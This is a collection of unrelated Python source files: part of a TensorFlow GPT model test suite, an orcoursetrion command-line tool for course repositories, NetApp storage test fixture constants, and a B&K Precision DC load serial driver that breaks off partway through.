token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": input_mask}
return config, inputs_dict
@require_tf
class TFOpenAIGPTModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (
(TFOpenAIGPTModel, TFOpenAIGPTLMHeadModel, TFOpenAIGPTDoubleHeadsModel, TFOpenAIGPTForSequenceClassification)
if is_tf_available()
else ()
)
all_generative_model_classes = (
(TFOpenAIGPTLMHeadModel,) if is_tf_available() else ()
) # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly
test_head_masking = False
test_onnx = False
def setUp(self):
self.model_tester = TFOpenAIGPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_openai_gpt_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)
def test_openai_gpt_lm_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_lm_head(*config_and_inputs)
def test_openai_gpt_double_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_double_head(*config_and_inputs)
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert name is None
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
def test_openai_gpt_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = TFOpenAIGPTModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_tf
class TFOPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
@slow
def test_lm_generate_openai_gpt(self):
model = TFOpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
input_ids = tf.convert_to_tensor([[481, 4735, 544]], dtype=tf.int32) # the president is
expected_output_ids = [
481,
4735,
544,
246,
963,
870,
762,
239,
244,
40477,
244,
249,
719,
881,
487,
544,
240,
244,
603,
481,
] # the president is a very good man. " \n " i\'m sure he is, " said the
output_ids = model.generate(input_ids, do_sample=False)
self.assertListEqual(output_ids[0].numpy().tolist(), expected_output_ids)
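# Sketch for running just this module locally (the file path is an assumption
# based on the relative imports above; RUN_SLOW=1 enables the @slow tests):
#   RUN_SLOW=1 python -m pytest tests/test_modeling_tf_openai.py -k "openai_gpt"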
|
|
# -*- coding: utf-8 -*-
"""
Command line interface to orcoursetrion
"""
from __future__ import print_function
import argparse
from orcoursetrion import actions
def run_create_export_repo(args):
"""Run the create_export_repo action using args"""
repo = actions.create_export_repo(args.course, args.term, args.description)
print(
'Newly created repository for exports created at {0}'.format(
repo['html_url']
)
)
def run_rerun_studio(args):
"""Run the rerun_studio action using args"""
repo = actions.rerun_studio(args.course, args.term, args.new_term)
print(
'Web hooks removed from old repository and newly created repository '
'for exports created at {0}'.format(
repo['html_url']
)
)
def run_release_studio(args):
"""Run the release_studio action using args"""
actions.release_studio(args.course, args.term)
print('Added production Web hooks to course')
def run_create_xml_repo(args):
"""Run the create_xml_repo action using args"""
repo = actions.create_xml_repo(
args.course, args.term, args.team, args.member, args.description
)
print(
'Newly created repository for XML course created at {0}'.format(
repo['html_url']
)
)
def run_rerun_xml(args):
"""Run the rerun_xml action using args"""
num_deleted_hooks = actions.rerun_xml(args.course, args.term)
print(
"Successfully removed {0} hooks from course's repository.".format(
num_deleted_hooks
)
)
def run_release_xml(args):
"""Run the release_xml action using args"""
actions.release_xml(args.course, args.term)
print('Added production Web hooks to course')
def run_put_team(args):
"""Run the put_teams action using args"""
actions.put_team(
args.org, args.team, args.read_only, args.member
)
print('Team successfully modified/created.')
def execute():
"""Execute command line orcoursetrion actions.
"""
parser = argparse.ArgumentParser(
prog='orcoursetrion',
        description=('Run an orcoursetrion action.\n')
)
subparsers = parser.add_subparsers(
title="Actions",
description='Valid actions',
)
# Setup subparsers for each action
# Create studio repository
create_export_repo = subparsers.add_parser(
'create_export_repo',
help='Create a Studio export git repository'
)
create_export_repo.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    create_export_repo.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
)
create_export_repo.add_argument(
'-d', '--description', type=str,
help='Description string to set for repository'
)
create_export_repo.set_defaults(func=run_create_export_repo)
# Rerun Studio Course
rerun_studio = subparsers.add_parser(
'rerun_studio',
help='Rerun a Studio course'
)
rerun_studio.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    rerun_studio.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
    )
    rerun_studio.add_argument(
        '-n', '--new-term', type=str, required=True,
        help='New term to rerun the course in (e.g. Spring_2016)'
)
rerun_studio.set_defaults(func=run_rerun_studio)
# Release Studio Course
release_studio = subparsers.add_parser(
'release_studio',
help='Release a Studio course (currently just add Web hooks)'
)
release_studio.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    release_studio.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
)
release_studio.set_defaults(func=run_release_studio)
# Create XML repository
create_xml_repo = subparsers.add_parser(
'create_xml_repo',
help='Create an XML/latex2edx git repository'
)
create_xml_repo.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    create_xml_repo.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
)
create_xml_repo.add_argument(
'-g', '--team', type=str, default=None,
        help='Name of team in organization that should have access; creates' +
        ' a new team with the same name as the repository if empty.'
)
create_xml_repo.add_argument(
'-m', '--member', nargs='*', type=str,
help='One or more usernames to replace/add to team membership.'
)
create_xml_repo.add_argument(
'-d', '--description', type=str,
help='Description string to set for repository'
)
create_xml_repo.set_defaults(func=run_create_xml_repo)
# Rerun XML Course
rerun_xml = subparsers.add_parser(
'rerun_xml',
help='Rerun an XML course (currently just deletes Web hooks)'
)
rerun_xml.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    rerun_xml.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
)
rerun_xml.set_defaults(func=run_rerun_xml)
# Release XML Course
release_xml = subparsers.add_parser(
'release_xml',
help='Release an XML course (currently just adds Web hooks)'
)
release_xml.add_argument(
'-c', '--course', type=str, required=True,
        help='Course to work on (e.g. 6.0001)'
    )
    release_xml.add_argument(
        '-t', '--term', type=str, required=True,
        help='Term of the course (e.g. Spring_2015)'
)
release_xml.set_defaults(func=run_release_xml)
# Create/Modify Team
put_team = subparsers.add_parser(
'put_team',
help='Create or modify a team in an organization'
)
put_team.add_argument(
'-o', '--org', type=str, required=True,
help='Organization for the team'
)
put_team.add_argument(
'-g', '--team', type=str, required=True,
help='Name of team in organization that should have access'
)
put_team.add_argument(
'-r', '--read_only', dest='read_only', action='store_true',
help='Team should only have pull access to repositories'
)
put_team.add_argument(
'-m', '--member', nargs='*', type=str,
help='One or more usernames to replace the membership of the team'
)
put_team.set_defaults(func=run_put_team)
# Run the action
args = parser.parse_args()
args.func(args)
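# Example invocations (course, term, org, and team values are hypothetical):
#   orcoursetrion create_export_repo -c 6.0001 -t Spring_2015
#   orcoursetrion put_team -o MyOrg -g my-team -r -m user1 user2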
|
|
# Copyright (c) - 2014, Clinton Knight. All rights reserved.
# Copyright (c) - 2015, Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
VOLUME_ID = 'f10d1a84-9b7b-427e-8fec-63c48b509a56'
LUN_ID = 'ee6b4cc7-477b-4016-aa0c-7127b4e3af86'
LUN_HANDLE = 'fake_lun_handle'
LUN_NAME = 'lun1'
LUN_SIZE = 3
LUN_TABLE = {LUN_NAME: None}
SIZE = 1024
HOST_NAME = 'fake.host.name'
BACKEND_NAME = 'fake_backend_name'
POOL_NAME = 'aggr1'
SHARE_IP = '192.168.99.24'
EXPORT_PATH = '/fake/export/path'
NFS_SHARE = '%s:%s' % (SHARE_IP, EXPORT_PATH)
HOST_STRING = '%s@%s#%s' % (HOST_NAME, BACKEND_NAME, POOL_NAME)
NFS_HOST_STRING = '%s@%s#%s' % (HOST_NAME, BACKEND_NAME, NFS_SHARE)
FLEXVOL = 'openstack-flexvol'
NFS_FILE_PATH = 'nfsvol'
PATH = '/vol/%s/%s' % (POOL_NAME, LUN_NAME)
LUN_METADATA = {
'OsType': None,
'SpaceReserved': 'true',
'Path': PATH,
'Qtree': None,
'Volume': POOL_NAME,
}
VOLUME = {
'name': LUN_NAME,
'size': SIZE,
'id': VOLUME_ID,
'host': HOST_STRING,
}
NFS_VOLUME = {
'name': NFS_FILE_PATH,
'size': SIZE,
'id': VOLUME_ID,
'host': NFS_HOST_STRING,
}
NETAPP_VOLUME = 'fake_netapp_volume'
UUID1 = '12345678-1234-5678-1234-567812345678'
LUN_PATH = '/vol/vol0/%s' % LUN_NAME
VSERVER_NAME = 'openstack-vserver'
FC_VOLUME = {'name': 'fake_volume'}
FC_INITIATORS = ['21000024ff406cc3', '21000024ff406cc2']
FC_FORMATTED_INITIATORS = ['21:00:00:24:ff:40:6c:c3',
'21:00:00:24:ff:40:6c:c2']
FC_TARGET_WWPNS = ['500a098280feeba5', '500a098290feeba5',
'500a098190feeba5', '500a098180feeba5']
FC_FORMATTED_TARGET_WWPNS = ['50:0a:09:82:80:fe:eb:a5',
'50:0a:09:82:90:fe:eb:a5',
'50:0a:09:81:90:fe:eb:a5',
'50:0a:09:81:80:fe:eb:a5']
FC_CONNECTOR = {'ip': '1.1.1.1',
'host': 'fake_host',
'wwnns': ['20000024ff406cc3', '20000024ff406cc2'],
'wwpns': ['21000024ff406cc3', '21000024ff406cc2']}
FC_I_T_MAP = {'21000024ff406cc3': ['500a098280feeba5', '500a098290feeba5'],
'21000024ff406cc2': ['500a098190feeba5', '500a098180feeba5']}
FC_I_T_MAP_COMPLETE = {'21000024ff406cc3': FC_TARGET_WWPNS,
'21000024ff406cc2': FC_TARGET_WWPNS}
FC_FABRIC_MAP = {'fabricB':
{'target_port_wwn_list':
['500a098190feeba5', '500a098180feeba5'],
'initiator_port_wwn_list': ['21000024ff406cc2']},
'fabricA':
{'target_port_wwn_list':
['500a098290feeba5', '500a098280feeba5'],
'initiator_port_wwn_list': ['21000024ff406cc3']}}
FC_TARGET_INFO = {'driver_volume_type': 'fibre_channel',
'data': {'target_lun': 1,
'initiator_target_map': FC_I_T_MAP,
'access_mode': 'rw',
'target_wwn': FC_TARGET_WWPNS,
'target_discovered': True}}
FC_TARGET_INFO_EMPTY = {'driver_volume_type': 'fibre_channel', 'data': {}}
FC_TARGET_INFO_UNMAP = {'driver_volume_type': 'fibre_channel',
'data': {'target_wwn': FC_TARGET_WWPNS,
'initiator_target_map': FC_I_T_MAP}}
IGROUP1_NAME = 'openstack-igroup1'
IGROUP1 = {
'initiator-group-os-type': 'linux',
'initiator-group-type': 'fcp',
'initiator-group-name': IGROUP1_NAME,
}
ISCSI_VOLUME = {
'name': 'fake_volume',
'id': 'fake_id',
'provider_auth': 'fake provider auth',
}
ISCSI_LUN = {'name': ISCSI_VOLUME, 'lun_id': 42}
ISCSI_SERVICE_IQN = 'fake_iscsi_service_iqn'
ISCSI_CONNECTION_PROPERTIES = {
'data': {
'auth_method': 'fake',
'auth_password': 'auth',
'auth_username': 'provider',
'target_discovered': False,
'target_iqn': ISCSI_SERVICE_IQN,
'target_lun': 42,
'target_portal': '1.2.3.4:3260',
'volume_id': 'fake_id',
},
'driver_volume_type': 'iscsi',
}
ISCSI_CONNECTOR = {
'ip': '1.1.1.1',
'host': 'fake_host',
'initiator': 'fake_initiator_iqn',
}
ISCSI_TARGET_DETAILS_LIST = [
{'address': '5.6.7.8', 'port': '3260'},
{'address': '1.2.3.4', 'port': '3260'},
{'address': '99.98.97.96', 'port': '3260'},
]
IPV4_ADDRESS = '192.168.14.2'
IPV6_ADDRESS = 'fe80::6e40:8ff:fe8a:130'
NFS_SHARE_IPV4 = IPV4_ADDRESS + ':' + EXPORT_PATH
NFS_SHARE_IPV6 = IPV6_ADDRESS + ':' + EXPORT_PATH
RESERVED_PERCENTAGE = 7
TOTAL_BYTES = 4797892092432
AVAILABLE_BYTES = 13479932478
CAPACITY_VALUES = (TOTAL_BYTES, AVAILABLE_BYTES)
QOS_SPECS = {}
EXTRA_SPECS = {}
MAX_THROUGHPUT = '21734278B/s'
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
QOS_POLICY_GROUP_INFO_LEGACY = {
'legacy': 'legacy-' + QOS_POLICY_GROUP_NAME,
'spec': None,
}
QOS_POLICY_GROUP_SPEC = {
'max_throughput': MAX_THROUGHPUT,
'policy_name': QOS_POLICY_GROUP_NAME,
}
QOS_POLICY_GROUP_INFO = {'legacy': None, 'spec': QOS_POLICY_GROUP_SPEC}
CLONE_SOURCE_NAME = 'fake_clone_source_name'
CLONE_SOURCE_ID = 'fake_clone_source_id'
CLONE_SOURCE_SIZE = 1024
CLONE_SOURCE = {
'size': CLONE_SOURCE_SIZE,
'name': CLONE_SOURCE_NAME,
'id': CLONE_SOURCE_ID,
}
CLONE_DESTINATION_NAME = 'fake_clone_destination_name'
CLONE_DESTINATION_SIZE = 1041
CLONE_DESTINATION_ID = 'fake_clone_destination_id'
CLONE_DESTINATION = {
'size': CLONE_DESTINATION_SIZE,
'name': CLONE_DESTINATION_NAME,
'id': CLONE_DESTINATION_ID,
}
SNAPSHOT = {
'name': 'fake_snapshot_name',
'volume_size': SIZE,
'volume_id': 'fake_volume_id',
}
VOLUME_REF = {'name': 'fake_vref_name', 'size': 42}
FILE_LIST = ['file1', 'file2', 'file3']
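# These constants are intended to be imported by unit tests as shared fixtures,
# e.g. (the module path is an assumption, not part of this file):
#   from cinder.tests.unit.volume.drivers.netapp import fakes as fake
#   self.assertEqual(fake.LUN_SIZE, lun.size)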
|
|
'''
Open Source Initiative OSI - The MIT License:Licensing
Tue, 2006-10-31 04:56 - nelson
The MIT License
Copyright (c) 2009 BK Precision
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
This python module provides a functional interface to a B&K DC load
through the DCLoad object. This object can also be used as a COM
server by running this module as a script to register it. All the
DCLoad object methods return strings. All units into and out of the
DCLoad object's methods are in SI units.
See the documentation file that came with this script.
$RCSfile: dcload.py $
$Revision: 1.0 $
$Date: 2008/05/17 15:57:15 $
$Author: Don Peterson $
'''
from __future__ import division
import sys, time, serial
from string import join
try:
from win32com.server.exception import COMException
except:
pass
# Debugging information is set to stdout by default. You can change
# the out variable to another method to e.g. write to a different
# stream.
out = sys.stdout.write
nl = "\n"
class InstrumentException(Exception): pass
class InstrumentInterface:
    '''Provides the interface to an instrument that communicates in 26 byte
    packets, along with utility functions.
'''
debug = 0 # Set to 1 to see dumps of commands and responses
length_packet = 26 # Number of bytes in a packet
convert_current = 1e4 # Convert current in A to 0.1 mA
convert_voltage = 1e3 # Convert voltage in V to mV
convert_power = 1e3 # Convert power in W to mW
convert_resistance = 1e3 # Convert resistance in ohm to mohm
to_ms = 1000 # Converts seconds to ms
# Number of settings storage registers
lowest_register = 1
highest_register = 25
# Values for setting modes of CC, CV, CW, or CR
modes = {"cc":0, "cv":1, "cw":2, "cr":3}
def Initialize(self, com_port, baudrate, address=0):
self.sp = serial.Serial(com_port, baudrate)
self.address = address
def DumpCommand(self, bytes):
'''Print out the contents of a 26 byte command. Example:
aa .. 20 01 .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. cb
'''
assert(len(bytes) == self.length_packet)
header = " "*3
out(header)
for i in xrange(self.length_packet):
if i % 10 == 0 and i != 0:
out(nl + header)
if i % 5 == 0:
out(" ")
s = "%02x" % ord(bytes[i])
if s == "00":
# Use the decimal point character if you see an
# unattractive printout on your machine.
#s = "."*2
# The following alternate character looks nicer
# in a console window on Windows.
s = chr(250)*2
out(s)
out(nl)
def CommandProperlyFormed(self, cmd):
'''Return 1 if a command is properly formed; otherwise, return 0.
'''
commands = (
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29,
0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33,
0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D,
0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51,
0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B,
0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x12
)
# Must be proper length
if len(cmd) != self.length_packet:
out("Command length = " + str(len(cmd)) + "-- should be " + \
str(self.length_packet) + nl)
return 0
# First character must be 0xaa
if ord(cmd[0]) != 0xaa:
out("First byte should be 0xaa" + nl)
return 0
# Second character (address) must not be 0xff
if ord(cmd[1]) == 0xff:
out("Second byte cannot be 0xff" + nl)
return 0
# Third character must be valid command
byte3 = "%02X" % ord(cmd[2])
if ord(cmd[2]) not in commands:
out("Third byte not a valid command: %s\n" % byte3)
return 0
# Calculate checksum and validate it
checksum = self.CalculateChecksum(cmd)
if checksum != ord(cmd[-1]):
out("Incorrect checksum" + nl)
return 0
return 1
def CalculateChecksum(self, cmd):
'''Return the sum of the bytes in cmd modulo 256.
'''
assert((len(cmd) == self.length_packet - 1) or (len(cmd) == self.length_packet))
checksum = 0
for i in xrange(self.length_packet - 1):
checksum += ord(cmd[i])
checksum %= 256
return checksum
def StartCommand(self, byte):
return chr(0xaa) + chr(self.address) + chr(byte)
def SendCommand(self, command):
'''Sends the command to the serial stream and returns the 26 byte
response.
'''
assert(len(command) == self.length_packet)
self.sp.write(command)
response = self.sp.read(self.length_packet)
assert(len(response) == self.length_packet)
return response
def ResponseStatus(self, response):
'''Return a message string about what the response meant. The
empty string means the response was OK.
'''
responses = {
0x90 : "Wrong checksum",
0xA0 : "Incorrect parameter value",
0xB0 : "Command cannot be carried out",
0xC0 : "Invalid command",
0x80 : "",
}
assert(len(response) == self.length_packet)
assert(ord(response[2]) == 0x12)
return responses[ord(response[3])]
def CodeInteger(self, value, num_bytes=4):
'''Construct a little endian string for the indicated value. Two
and 4 byte integers are the only ones allowed.
'''
assert(num_bytes == 1 or num_bytes == 2 or num_bytes == 4)
value = int(value) # Make sure it's an integer
s = chr(value & 0xff)
if num_bytes >= 2:
s += chr((value & (0xff << 8)) >> 8)
if num_bytes == 4:
s += chr((value & (0xff << 16)) >> 16)
s += chr((value & (0xff << 24)) >> 24)
assert(len(s) == 4)
return s
def DecodeInteger(self, str):
'''Construct an integer from the little endian string. 1, 2, and 4 byte
strings are the only ones allowed.
'''
assert(len(str) == 1 or len(str) == 2 or len(str) == 4)
n = ord(str[0])
if len(str) >= 2:
n += (ord(str[1]) << 8)
if len(str) == 4:
n += (ord(str[2]) << 16)
n += (ord(str[3]) << 24)
return n
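    # Round-trip example (values are illustrative): CodeInteger(0x12345678)
    # yields the little endian string '\x78\x56\x34\x12', and
    # DecodeInteger('\x78\x56\x34\x12') returns 0x12345678 again.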
def GetReserved(self, num_used):
'''Construct a string of nul characters of such length to pad a
command to one less than the packet size (leaves room for the
        checksum byte).
'''
num = self.length_packet - num_used - 1
assert(num > 0)
return chr(0)*num
def PrintCommandAndResponse(self, cmd, response, cmd_name):
'''Print the command and its response if debugging is on.
'''
assert(cmd_name)
if self.debug:
out(cmd_name + " command:" + nl)
self.DumpCommand(cmd)
out(cmd_name + " response:" + nl)
self.DumpCommand(response)
def GetCommand(self, command, value, num_bytes=4):
'''Construct the command with an integer value of 0, 1, 2, or
4 bytes.
'''
cmd = self.StartCommand(command)
if num_bytes > 0:
r = num_bytes + 3
cmd += self.CodeInteger(value)[:num_bytes] + self.Reserved(r)
else:
cmd += self.Reserved(0)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
return cmd
def GetData(self, data, num_bytes=4):
'''Extract the little endian integer from the data and return it.
'''
assert(len(data) == self.length_packet)
if num_bytes == 1:
return ord(data[3])
elif num_bytes == 2:
return self.DecodeInteger(data[3:5])
elif num_bytes == 4:
return self.DecodeInteger(data[3:7])
else:
raise Exception("Bad number of bytes: %d" % num_bytes)
def Reserved(self, num_used):
assert(num_used >= 3 and num_used < self.length_packet - 1)
return chr(0)*(self.length_packet - num_used - 1)
def SendIntegerToLoad(self, byte, value, msg, num_bytes=4):
'''Send the indicated command along with value encoded as an integer
of the specified size. Return the instrument's response status.
'''
cmd = self.GetCommand(byte, value, num_bytes)
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, msg)
return self.ResponseStatus(response)
def GetIntegerFromLoad(self, cmd_byte, msg, num_bytes=4):
'''Construct a command from the byte in cmd_byte, send it, get
the response, then decode the response into an integer with the
number of bytes in num_bytes. msg is the debugging string for
the printout. Return the integer.
'''
assert(num_bytes == 1 or num_bytes == 2 or num_bytes == 4)
cmd = self.StartCommand(cmd_byte)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, msg)
return self.DecodeInteger(response[3:3 + num_bytes])
class DCLoad(InstrumentInterface):
_reg_clsid_ = "{943E2FA3-4ECE-448A-93AF-9ECAEB49CA1B}"
_reg_desc_ = "B&K DC Load COM Server"
_reg_progid_ = "BKServers.DCLoad85xx" # External name
_public_attrs_ = ["debug"]
_public_methods_ = [
"DisableLocalControl",
"EnableLocalControl",
"GetBatteryTestVoltage",
"GetCCCurrent",
"GetCRResistance",
"GetCVVoltage",
"GetCWPower",
"GetFunction",
"GetInputValues",
"GetLoadOnTimer",
"GetLoadOnTimerState",
"GetMaxCurrent",
"GetMaxPower",
"GetMaxVoltage",
"GetMode",
"GetProductInformation",
"GetRemoteSense",
"GetTransient",
"GetTriggerSource",
"Initialize",
"RecallSettings",
"SaveSettings",
"SetBatteryTestVoltage",
"SetCCCurrent",
"SetCRResistance",
"SetCVVoltage",
"SetCWPower",
"SetCommunicationAddress",
"SetFunction",
"SetLoadOnTimer",
"SetLoadOnTimerState",
"SetLocalControl",
"SetMaxCurrent",
"SetMaxPower",
"SetMaxVoltage",
"SetMode",
"SetRemoteControl",
"SetRemoteSense",
"SetTransient",
"SetTriggerSource",
"TimeNow",
"TriggerLoad",
"TurnLoadOff",
"TurnLoadOn",
]
def Initialize(self, com_port, baudrate, address=0):
"Initialize the base class"
InstrumentInterface.Initialize(self, com_port, baudrate, address)
def TimeNow(self):
"Returns a string containing the current time"
return time.asctime()
def TurnLoadOn(self):
"Turns the load on"
msg = "Turn load on"
on = 1
return self.SendIntegerToLoad(0x21, on, msg, num_bytes=1)
def TurnLoadOff(self):
"Turns the load off"
msg = "Turn load off"
off = 0
return self.SendIntegerToLoad(0x21, off, msg, num_bytes=1)
def SetRemoteControl(self):
"Sets the load to remote control"
msg = "Set remote control"
remote = 1
return self.SendIntegerToLoad(0x20, remote, msg, num_bytes=1)
def SetLocalControl(self):
"Sets the load to local control"
msg = "Set local control"
local = 0
return self.SendIntegerToLoad(0x20, local, msg, num_bytes=1)
def SetMaxCurrent(self, current):
"Sets the maximum current the load will sink"
msg = "Set max current"
return self.SendIntegerToLoad(0x24, current*self.convert_current, msg, num_bytes=4)
def GetMaxCurrent(self):
"Returns the maximum current the load will sink"
msg = "Set max current"
return self.GetIntegerFromLoad(0x25, msg, num_bytes=4)/self.convert_current
def SetMaxVoltage(self, voltage):
"Sets the maximum voltage the load will allow"
msg = "Set max voltage"
return self.SendIntegerToLoad(0x22, voltage*self.convert_voltage, msg, num_bytes=4)
def GetMaxVoltage(self):
"Gets the maximum voltage the load will allow"
msg = "Get max voltage"
return self.GetIntegerFromLoad(0x23, msg, num_bytes=4)/self.convert_voltage
def SetMaxPower(self, power):
"Sets the maximum power the load will allow"
msg = "Set max power"
return self.SendIntegerToLoad(0x26, power*self.convert_power, msg, num_bytes=4)
def GetMaxPower(self):
"Gets the maximum power the load will allow"
msg = "Get max power"
return self.GetIntegerFromLoad(0x27, msg, num_bytes=4)/self.convert_power
def SetMode(self, mode):
"Sets the mode (constant current, constant voltage, etc."
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
msg = "Set mode"
return self.SendIntegerToLoad(0x28, self.modes[mode.lower()], msg, num_bytes=1)
def GetMode(self):
"Gets the mode (constant current, constant voltage, etc."
msg = "Get mode"
mode = self.GetIntegerFromLoad(0x29, msg, num_bytes=1)
modes_inv = {0:"cc", 1:"cv", 2:"cw", 3:"cr"}
return modes_inv[mode]
def SetCCCurrent(self, current):
"Sets the constant current mode's current level"
msg = "Set CC current"
return self.SendIntegerToLoad(0x2A, current*self.convert_current, msg, num_bytes=4)
def GetCCCurrent(self):
"Gets the constant current mode's current level"
msg = "Get CC current"
return self.GetIntegerFromLoad(0x2B, msg, num_bytes=4)/self.convert_current
def SetCVVoltage(self, voltage):
"Sets the constant voltage mode's voltage level"
msg = "Set CV voltage"
return self.SendIntegerToLoad(0x2C, voltage*self.convert_voltage, msg, num_bytes=4)
def GetCVVoltage(self):
"Gets the constant voltage mode's voltage level"
msg = "Get CV voltage"
return self.GetIntegerFromLoad(0x2D, msg, num_bytes=4)/self.convert_voltage
def SetCWPower(self, power):
"Sets the constant power mode's power level"
msg = "Set CW power"
return self.SendIntegerToLoad(0x2E, power*self.convert_power, msg, num_bytes=4)
def GetCWPower(self):
"Gets the constant power mode's power level"
msg = "Get CW power"
return self.GetIntegerFromLoad(0x2F, msg, num_bytes=4)/self.convert_power
def SetCRResistance(self, resistance):
"Sets the constant resistance mode's resistance level"
msg = "Set CR resistance"
return self.SendIntegerToLoad(0x30, resistance*self.convert_resistance, msg, num_bytes=4)
def GetCRResistance(self):
"Gets the constant resistance mode's resistance level"
msg = "Get CR resistance"
return self.GetIntegerFromLoad(0x31, msg, num_bytes=4)/self.convert_resistance
def SetTransient(self, mode, A, A_time_s, B, B_time_s, operation="continuous"):
'''Sets up the transient operation mode. mode is one of
"CC", "CV", "CW", or "CR".
'''
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
opcodes = {"cc":0x32, "cv":0x34, "cw":0x36, "cr":0x38}
if mode.lower() == "cc":
const = self.convert_current
elif mode.lower() == "cv":
const = self.convert_voltage
elif mode.lower() == "cw":
const = self.convert_power
else:
const = self.convert_resistance
cmd = self.StartCommand(opcodes[mode.lower()])
cmd += self.CodeInteger(A*const, num_bytes=4)
cmd += self.CodeInteger(A_time_s*self.to_ms, num_bytes=2)
cmd += self.CodeInteger(B*const, num_bytes=4)
cmd += self.CodeInteger(B_time_s*self.to_ms, num_bytes=2)
transient_operations = {"continuous":0, "pulse":1, "toggled":2}
cmd += self.CodeInteger(transient_operations[operation], num_bytes=1)
cmd += self.Reserved(16)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Set %s transient" % mode)
return self.ResponseStatus(response)
def GetTransient(self, mode):
"Gets the transient mode settings"
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
opcodes = {"cc":0x33, "cv":0x35, "cw":0x37, "cr":0x39}
cmd = self.StartCommand(opcodes[mode.lower()])
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get %s transient" % mode)
A = self.DecodeInteger(response[3:7])
A_timer_ms = self.DecodeInteger(response[7:9])
